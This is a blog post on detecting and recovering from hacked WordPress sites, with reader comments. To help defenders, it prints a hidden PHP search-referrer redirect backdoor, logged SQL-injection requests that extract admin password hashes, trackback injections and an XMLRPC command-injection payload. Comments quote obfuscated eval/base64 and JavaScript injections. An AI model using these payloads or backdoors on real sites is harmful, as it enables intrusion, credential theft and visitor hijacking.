Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.
In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net
If you’ve been hacked
- Upgrade to the latest version of WordPress.
- Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
- Change your passwords after upgrading and make sure the hacker didn’t create another user.
- Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
define(‘SECRET_KEY’, ‘1234567890′ );
Hidden Code
The bad guys are using a number of ways to hide their hacks:
- The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the
eval()command, orbase64_decode(). Here’s a code snippet taken from here:
< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php
Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
- Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPressThat file may have this chunk of code too which is to do with the uploader:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule> - They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
- Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
- Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like
../uploads/2008/05/04/jhjyahjhnjnva.jpg
. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again. - Check your uploads directory for that jpg file and delete it.
- This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
Change Your Passwords
Once you’ve upgraded and verified that your install is clean again you must do the following:
- Change the passwords of all users on your system.
- Make sure the hacker hasn’t added another user account he can use to login again.
Stop the bad guys
One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).
- I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
- The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinitIn the configuration file above I put the following:
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
Please Upgrade
There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.
Help a friend
Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:
<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>
What does a hack look like?
I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
- First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
- Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
) - When that fails, he grabs xmlrpc.php.
- He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
HTTP_RAW_POST_DATA: <?xml version=”1.0″?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member></blockquote>
- That fails too so the query is repeated with similar SQL.
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
- Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\’
[1740009377] => 1
[496546471] => 1
) - And another trackback:
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\’)/*
[charset] => UTF-7
) - Before finally going back to xmlrpc.php with this POST request:
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall> - In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1 - Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
You might also like
- WordPress Exploit Scanner 0.1
My previous post about hacked WordPress sites caused Donnacha to- Exploit Scanner 0.5
The WordPress Exploit Scanner has been updated, with lots of- Catch website file changes with AIDE
A week ago I suggested installing AIDE to track changes
If you like this post then please subscribe to my full RSS feed. You can also click here to subscribe by email. There are also my fabulous photos and funny videos to explore too!
We also got hit
Our press release section got screwed over by the hacker.
We did also think about the issue of restoring your permalinks, and the need to do them EXACTLY as they were in the past, to avoid loss of search engine results, and possibly traffic… Most people have easy to remember permalinks, but for people that don’t, and who are silly enough not to have the structure backed up (cough) then here is a guide: http://www.kingpin-seo.co.uk/press-releases/how-to-recover-your-permalinks-settings-to-get-your-indexed-posts-back-dont-loose-google-serps/116611
Hope you don’t mind me linking to it! – Not trying to spam you guys, just trying to help bloggers avoid SERP loss.
Great info! Thanks for the information. Fortunately, I upgraded before being hacked. However, there are some best practices that I need to update my site with.
BTW…love the WP-Supercache plugin. Thanks!!!
I may have been hacked, at the very least I had people add themselves as users, never got to the ADMIN point I think, but I did find this in my php code… I use the revolution theme… and am not sure if this should be there or not.
There doesn’t appear to be anything wrong with the site or pages but here is the code:
SELECT *
FROM `DatabasenameXXXXXXXXXXXX`.`wp_options`
WHERE (
`option_id` LIKE ‘%base64_decode%’
OR `blog_id` LIKE ‘%base64_decode%’
OR `option_name` LIKE ‘%base64_decode%’
OR `option_value` LIKE ‘%base64_decode%’
OR `autoload` LIKE ‘%base64_decode%’
)
LIMIT 0 , 30
Am I ok.. or did something happen?
Great piece! Looks like I was hacked today! I’ve upgraded to the new WP but the problem I’m having is that when I go to admin – posts – it tells me there are no posts found – but the numeric line above it states that there are posts. My categories are also missing.
Any suggestions as to where to look? Please help!!!!!!
Thanks,
Hi there
) Looking desperatetly for help 
I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you 
)
My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to to click the default permalink structure again and click save changes, now your posts should be working again, mine start working again.
I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.
Thank you for all these useful informations. Unfortunately it`s a matter of time until a Wordpress blog will be attacked by hackers, in a form or other. The main rule is a constantly DB backup. Upgrade your WP and the plugins when it`s possible, try to protect as much you can, in this article you can find useful details, but don`t forget, secure your important dates by regular backups.
For the sake of helping of course, i want to say something else.
When i was hacked, i mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, i guess the hacker who wrote the worm did not want to make damage, real and extensive damage i mean, i guess he wanted only to scare people into upgrading your wordpress blog which makes me think a lot, i mean, who would want to scare every wordpress blog user in to upgrading to the latest patch!!!?
But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.
If you go to the theme editor in the appereance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation on your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, i mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the files permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code in to the files you just change permissions to writable.
Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, beleave me, i really informed myself on this, delete it and deactive the service by going to the wordpress control panel, then in general options in some menu i can not recall the name, just browse through all and set it off, you do not need that.
Hope i helped.
Someone changing my urls like
Orgional URL’ were
http://mydomain.com/2009/08/14/my-post/
changed url
mydomain.com/?p=68
Please advice how to prevent this
Several of my sites were exploited some a hacker recently. As far as I am aware the hack used the wordpress php vunrability to gain access to my server and rather than creating havoc with wordpess files appears to have defaced one of my html sites by deleting the home page and uploading his or hers own stupid home page. So, in this case they used wordpress to gain entry but did not do anything only deface an unrelated non wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! changed all passwords, ftp,admin,sql and any other I could think off! it really is not nice being hacked and is a real pain in the rear so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not so its a good deterrent.
Someone changing my urls like
Orgional URL’ were
http://mydomain.com/2009/08/14/my-post/
changed url
mydomain.com/?p=68
How they changed it…any clue
As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.
Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.
Henceforth, I thought I was running with WP 2.8.4.
That is, until yesterday!
cPanel – Fantastico | WordPress
displayed in RED upgrade now to WP 2.8.4
Shock horror!
Install by Fantastico and it controls WordPress.
Upgrades by WP Wordpress do not update.
Warning:
WordPress upgrades – immediate.
Fantastic WP upgrades – timing delay, therefore, security risk.
My site been hacked.
I found the following injected code on my wordpress theme footer.php
if (!isset($_COOKIE["tll"])) echo “”;
My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1″); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.
THank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
Then i changed my WP name/password.
But the links came back a week later.
Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
ROSACEA:
How do i know what is safe to delete??
I feel like I am flying blind.
Any other tips will be appreciated.
Run the exploit scanner plugin to find the backdoor that has been installed on your system!
Hi Donncha-
Thank you SO much for replying to me. SO even though i keep deleting these hidden links from my header.php and then re upload the original header.php and i’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!
I’ve also deleted fake users and some odd user metadata.
Now, i ran your Exploit Plug in and this:
<?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
…plus a bunch of script comes up in what appears to be every plug in.
It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
Lisa
Site was hacked yesterday…..
The code at the bottom of this reply was added to several php files and script.js files.
I searched through all the files that were added at that time and copied some files from original wordpress installation to make the site work again.
I hope it is all clean now but know I have to do more to prevent this from happening again.
I am so annoyed that there are idiots spoiling peoples fun of setting up a website!
Thanks for the tips mentioned above it helped me getting the site back up and running, but still trying to find better security to prevent this from happening again.
Any tips are welcome!
/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement(’script’);X08yhffhg7xkxf.setAttribute(‘type’, ‘text/javascript’);X08yhffhg7xkxf.setAttribute(‘id’, ‘myscript1′);X08yhffhg7xkxf…. etcetr you get the point
Please try my script for fixing the files and make sure to change FTP passwords from your sites – they have been compromised
The link for the script: http://justcoded.com/wp-content/uploads/2009/12/curevir.php.txt
You can also check the post of my friend Martin to learn more about the virus and the experience of using my script
http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html
I posted the article about this here:
http://justcoded.com/article/gumblar-family-virus-removal-tool/
Thanks, this script is brilliant. Still getting hacked regularly so I haven’t solved the underlaying problem but by running your script teh site is up most of the time, I am setting up a new site ,with all new usernames and passwords.
Had to reinstall my pc as well because it got infected
My wordpress account was hacked, and I am trying to erase links that have been embedded to my site. I recently upgraded to the latest version of wordpress, changed my passwords, etc. Is there a way to edit my html to delete these embedded links? Here is my website: liisainvermont.com
we got hack, we have fix it but it happen again,
any suggestion for us?
thanks
Ed – didn’t you read the entire article?
It says upgrade wordpress and check for files that might be corrupt or changed from original. Also check all the folders you set write rights to.
I would do it with next steps:
1. backup entire mySql database to local computer
2. delete mySql database and create new mySql database
3. restore tbles from local backup
4. check tables for users and change passwords (hacker might have old passwords)
5. create clean install od latest wordpress
6. upgrade data in mysql as needed
Hope this helps…
I’m still not clear on this… if I delete the DB then upload the one I backe up, won’t it contain the fake users still?
check tables for users and change passwords (hacker might have old passwords)
How do I do this in MyPHPAdmin????
like many ive had not only a wordpress site hacked but then my server and not for the first time. yes i backup but thats not the point.
its come to a point were i changes hosts which took time and money
I wish I knew what to delete in MyPhpAdmin!!! This post assumes you know.
These tips always from nerd to nerd thing. Nobody wants to help regular guy. Thanks anyway.
Mikko – and sometimes the “regular guy” isn’t willing to learn how to administer a website and be responsible for it. Sounds harsh I know but you wouldn’t drive a car without getting some lessons first would you?
Hi Donncha, I don’t know if I’m being hacked or not, but I keep finding a new user in my list of users. They are calling themselves admin, but with no role assigned. He/she/it has made several draft posts. I am using wp2.9.1. Any ideas?
Follow all the advice in the post above, that will go a long way to getting rid of that user for good!
Thanks so much for the advice it came in very handy.
In my case it was in the header and was one very long line of code that seemed like it was just numbers and would be harmless, but it was the problem.
It blocked me..
1. I couldn’t perform from Firefox a simple view source code
2. Even with “NoScript” on full alert
3. Every time I would try, it would try to give me a Trojan.
4. FTPing the header file and attempting to view the local file with notepad also prompted an a/v alert.
5. I ended up using CPanel’s internal file editor to review the malicious code and remove it.
Thanks again so much for your help.
Donncha,
I loved the write-up above and will try it , especially the plugin to see what’s wrong with my site. The site works but the RSS feed http://feeds.feedburner.com/indimag is fried. I get the following :
Warning: session_start() [function.session-start]: open(/home/39725/data/tmp/sess_a694ffa38088c1954d4fcf657b2f0c54, O_RDWR) failed: Disk quota exceeded (122) in /nfs/c02/h08/mnt/39725/domains/indimag.com/html/wp-content/plugins/wordpress-automatic-upgrade/wordpress-automatic-upgrade.php on line 121
I would greatly greatly appreciate your/any other commenter’s thoughts on the issue.
Peace,
Madhu
INDIMAG.com
“Disk quota exceeded” – your disk is full.
Also, it looks like your website is on an NFS drive which is bad for caching. You should cache to a local drive.
Donncha,
I know of the NSF but to get local it’s costs and I’m living with it.
On the disk being full , per the disk usage report I can see I’m using just 2-3 % of my total available disk space — non dedicated , shared , but more than 9 GB free and usage is in MBs only as of now…
My hosting company is just telling using that disk usage report and saying it cannot be the disk, ought to be the plug in ..
Unfortunately you do need local storage if you want to use the plugin. There’s no way around it.
i have been hacked too
at this year july … bull shit! fucking hackers!
Hi Donnoha,
You’ve given really great information here and I will definitely apply it. I only have one problem: cant even get into the back end of my blog!! Do you have any suggestions?
When i try to go in with firefox, my antivirus comes up with the Mal/iframe-f If i try to go in with IE it doesnt let me even get near the blog front end or backend.
once i log in with firefox – everything goes to a white screen and hangs. Had googled and tried to find out what to do but your information is more extensive. do you ever do paid work?
(coz I am at my wits end and i dont have enough knowledge of php to know what to delete and what not to)
i have upgraded, added exploit, have manually looked through files for obvious iframes (didnt look for the rest of the code you’ve revealed here though).
have downloaded, scanned for malware with 5 different programs, have deleted users, changed passwords, and stood on my head with this thing !!!
any advice is appreciated
Please let me know about the paid thing
Thanks
Gaylea
very helpful, thanks! THis beats the mindless and annoying task of reloading everything!
I wanted to mention a couple of plugins that can really help keep your blog protected, especially to all you non-coding webmasters…
One is called Wordpress Firewall. It basically protects your Wordpress software from attempts to login, hack passwords or use the query strings to inject code or look for weaknesses. Pro’s: Closes another door or two in the face of hackers. Con’s: Have to ensure your current IP address is listed so you can edit your blog. (Check out whatismyip.com to find it)
Another is Wordpress Antivirus. This basically scans your theme files for injected type code. Tho not full proof, it does add another layer of possible protection.
I also use Wordpress Scanner to scan my installation for security holes.
Just Google any of these names and the word “wordpress” or “plugin” at the same time.
And remember, the safety of your blog and your visitors is in your hands… get proactive.
I use WPMU and Love WordPress !! I Had 13 sites totaling 4000+ “Real”members,and with in a few hours I had 10,000+Fake members all mixed in !And no sites ! most of the Fake blogs and user emails I noticed (later) were short first name sounding and all had numbers ending that short name, like saally272645343 had matching emails like saally272645343@whateverfake.com
I Also found a theme with files all cute and pretty :{ with images labeled as alott of the codes you mention above, theme was named flavour-extended-png in the themes folder, I am almost sure it is infected.Thank you for all the help wordpress world
Keep the Faith
[...] Last Update: Donncha, explaining the whole thing. [...]
[...] Did your WordPress site get hacked? is a great post by Donncha examining the latest “popular” hack(s), how to prevent them and/or how to recover. [...]
[...] According to Donncha, 2.5.x is not vulnerable to this, but I’ve personally seen a number of 2.5.x sites that are [...]
[...] to Donncha O Caoimh of Automattic, this exploit took advantage of a vulnerability that has been fixed in the latest stable version of WordPr…. As he points out, although 2.5.1 sites have succumbed to the attack, the evidence so far is that [...]
[...] do some research before you post: Did your WordPress site get hacked? All those wankers who claim that they were hacked even when they had upgraded to 2.5.1 were lying [...]
[...] hacked to redirect search engine queries. So I spent this morning working on a post about that hacking issue. No wonder we were late for the photowalk this [...]
[...] thread http://www.netpond.com/blogging-foru…idespread.html This is the official solution Did your WordPress site get hacked? This is for laughing at wankers WordPress › Support Wordpress Hacked and Redirected … [...]
[...] Diesmal gehen die kriminellen Cracker nicht so vor, dass sie das Blog sichtbar übernehmen, sondern sie leiten nur die Google-Suchergebnisse auf ihre kriminellen Spamseiten um. Aber die tolle Empfehlung, dass man doch einfach die aktuelle WP-Version nehmen soll, um etwas [...]
[...] another source of concern might be hacking. I wouldn’t want to let a hacker wander through my articles database and delete them all. The [...]
[...] Article: Holy Shmoly! Did your WordPress site get hacked? [...]
[...] articolo è stato scritto da Donncha O Caoimh proprio ieri, 8 giugno 2008. Mi è parso di assoluto interesse e vi propongo, dietro il permesso personale dell’autore, [...]
[...] some general advice on protecting wordpress from hacks and attacks. It contains some good piece of information + software that you can use to [...]
[...] questa parte vi lascio all’articolo originale e alla traduzione di aldolat perchè nella stragrande maggioranza dei casi non gestite da voi il [...]
[...] los foros de WordPress, ninguna persona con relación a la empresa ha emitido palabra alguna. Sólo Donncha ha informado que la rama 2.5.X no es vulnerable, aunque varios bloggers hemos dicho y seguimos diciendo lo contrario, debido a que nos hemos [...]
[...] Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for. [...]
[...] you upgrade your blog immediately when a new version is released, your site might already have been hacked. Therefore, if there are known WordPress vulnerabilities, old or otherwise, your blog is [...]
[...] (June 10): Check out this very helpful post by Donncha O [...]
[...] are taken to remove it. Donncha, one of the WP devs, attempts to allay everyone’s fears with this post explaining how to spot a hack and a few common sense tips on how to keep your WordPress site [...]
[...] Did your WordPress site get hacked? Did your WordPress site get hacked? (tags: wordpress security blogs hacking tutorials) [...]
[...] Did your WordPress site get hacked? :: Holy Shmoly – a really good overview of Wordpress blogs being hacked with some tips to help you combat any damaging effects. [...]
[...] on 2.5.0 or less, you should really upgrade. (hopefully bold pink writing will get your attention) Did your WordPress site get hacked? __________________ my sites :irish poker / irish jobs / seo faq / advertise jobs free / green [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] your WordPress site get hacked? June 11, 2008 — htaccess Did your WordPress site get hacked? Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember [...]
[...] If you want to be sure that those attackers responsible for such Wordpress exploit haven’t gotten inside your Wordpress blog, immediately check for the guides posted here. [...]
[...] is a reprint of an article by Donncha O Caoimh, the WordPress Guru. Remember a few weeks ago there was all that noise about WordPress blogs [...]
[...] may not tip off the blog owner in any way. The security vulnerabilities in Wordpress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening. If you are currently not running [...]
[...] owner in any way. The security vulnerabilities in Wordpress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening. If you are currently not running [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] But if you managed to find this article first, please (PLEASE!!!) head over to their blog and read the full article on how to protect your site from the [...]
[...] gives WordPress users a reminder to upgrade our WordPress blogs in light of possible security risks. Donncha know you have to upgrade WP!? Okay, bad pun. At any [...]
[...] i stosowanych przez hakerów metodach oraz o sposobach rozpoznania i usuwania zagrożenia bardzo dokładnie pisze Donncha O Caoimh, link do jej artykułu jest też ciągle dostępny na pulpicie administratora [...]
[...] More to read, Source: here [...]
[...] Did your Wordpress get hacked? [...]
[...] というのが6ヶ月前だった。ところが5月に同じことがまた起こったのだ。今度は別の新しいセキュリティホールが原因で、これもWordpressがアップデートで対処できる数日前に起こった。問題は、ほとんどのブログオーナーがブログをターゲットにするハッカーの脅威に気付いていないということだ。というのも、ブログオーナーに何の警告もしないで攻撃することがあるからだ。Wordpressのセキュリティの脆弱性が、非常に多数のブログに対する自動化された攻撃を引き起こした。ときとして、サイトオーナーは何が起こっているかわかっていない。 [...]
[...] more information on the code snippets used by hackers you can check detailed blogs dealing with the issue. In the meantime keep on [...]
[...] Did your WordPress site get hacked?Mijne niet denk ik… [...]
[...] vulnerabilidades de seguridad en Wordpress han dado lugar a ataques automatizados a través de una número muy elevado de los blogs, a menudo sin que los propietarios de sitios la realización de lo que está [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] seen a lot of sites (Shoemoney, Digital Point, Ocaoimh) reporting about a Wordpress hack that will “steal” your search engine traffic . As [...]
[...] Did your WordPress site get hacked? 2. Make Money Online: 100+ Tools and Resources 3. Win Friends and Clients for Joint Ventures – [...]
[...] besar situs Anda telah dikendalikan hacker. Untuk mencari tahu apakah blog Anda masih aman, ikuti instruksi di situs ini. Karena popularitasnya sebagai platform blogging, WordPress telah menjadi target utama para hacker [...]
[...] Holy Shmoly vous montre ce qu’il faut faire si votre blog se fait “hacker”… Toujours intéressant et à bookmarker absolument ! [...]
[...] alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser [...]
[...] This week a public exploit was discovered that could make your blog redirect to another site if clicked on via search engines. The hack places a piece of code in your header file and enables another site to take control of where visitors get redirected to based on their preference. You can make sure your blog hasn’t already been comprised by checking your header file for this code. [...]
[...] update them. I learned about this through Chris Jacobson, who linked to another blog called Holy Shmoly that not only talked about blogs getting hacked, but broke it down to explain [...]
[...] 16. Eumaeus, or Why are there so few Academic Bloggers? In the Odyssey, Odysseus returns home to find his home besieged, which, reunited with Telemachus, he plots to free; in Ulysses, Bloom and Stephen walk from Nighttown to a Cabman’s shelter west of the Custom House where they drink coffee and chat with a sailor, and Bloom expostulates to a prostitute on the perils of vice. (Yet again, consider Beijing, Chapter 14). It is no exaggeration to say that Ulysses has spawned an entire academic industry that is showing every sign of redoubling, but very little of it is in blogs. Yet, Crooked Timber has been continually surprised over the years about how many academics fail to take advantage of the Web as a medium for disseminating their work, and later gives sound advice to a PhD student wondering whether to embark on a blog; of course, one of the keys is to choose a good domain name, especially when they are increasingly scarce. Damien Mulley has good advice for all such bloggers on beating procrastination and writers block; and Holy Shmoly! (Donncha O Caoimh) has good advice on beating Wordpress hackers. [...]
[...] week ago I suggested installing AIDE to track changes on your server in case it had been hacked. I think AIDE Is so [...]
[...] hacker. Untuk mengetahui sama ada blog anda masih selamat, anda mungkin perlu ikuti perbincangan di SINI. Kerana platform blogging wordpress paling diminati, dan dikendalikan untuk tujuan SEO, traffic [...]
[...] Did your WordPress site get hacked? – More info about the structure of the Wrdpress attacks and how to prevent them, written by one of the Wordpress people. [...]
[...] vous conseille de vous rendre sur Holy Schmoly qui a écrit un post très complet à ce sujet. (en anglais malheureusement). Elle y parle des [...]
[...] If you use wordpress make sure you upgrade the version. I snoozed and my site is toasted. I hate the [...]
[...] WP site hacked? Holy Shmoley knows what to do [...]
[...] famoso Donncha descreve várias delas no post Did Your WordPress Site Get Hacked?, junto com as soluções para cada [...]
[...] Did your WordPress site get hacked? Do you know what to do in such a case? Read and learn from Did your WordPress site get hacked? [...]
[...] you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time…..(click to read more) If those quoted excerpts are not sufficient, Mr/Ms. WordPress Blogger, please do yourself a [...]
[...] my theme. Frustrated, I went to some of my friends on the WordPress team, and they pointed me at a great article from Donncha O Caoimh: Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known [...]
[...] my theme. Frustrated, I went to some of my friends on the WordPress team, and they pointed me at a great article from Donncha O Caoimh: Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known [...]
[...] I can’t believe my shit got hacked. I thought that only happened in the movies or to big corpo types. I thought some thing might go [...]
[...] Donncha O Caoimh posted a 6/8/2008 note about detecting whether your WP blog has been hacked, and some steps on dealing with it. [...]
[...] me however is one of the comments that i read at his website that points me to this other website, holy shmoly!, specifically, how secured is our wordpress?. Apparently there are some security flaws on previous [...]
[...] info here and here. On this site it took the form of links added into the template files, and with a display: [...]
[...] blogs running older versions of WordPress were hacked. Peter offers a way to have your site notify you when things are [...]
[...] previous post about hacked WordPress sites caused Donnacha to ask, After your last post on this subject, I was thinking that it would be a [...]
[...] old versions of the Wordpress script are vulnerable to various hacker attacks, Donncha published an article on the same topic few days back. Today he has released a plugin called Wordpress Exploit Scanner, [...]
[...] couple of weeks ago an article about hacked Wordpress sites came up in my Wordpress admin dashboard. I hadn’t been paying attention to all of the noise [...]
[...] 自WordPress 2.5发布以来,WordPress的开发blog和论坛里经常能看到关于WordPress安全性的讨论文章:1、2。其中谈到的黑客通常都是在blog上留下后台程序,或其他隐藏的恶意链接等。WordPress Exploit Scanner正是用于扫描WordPress是否被黑客留下了这些邪恶的东东。当然有些黑客爱删东西的,那就没办法了。 [...]
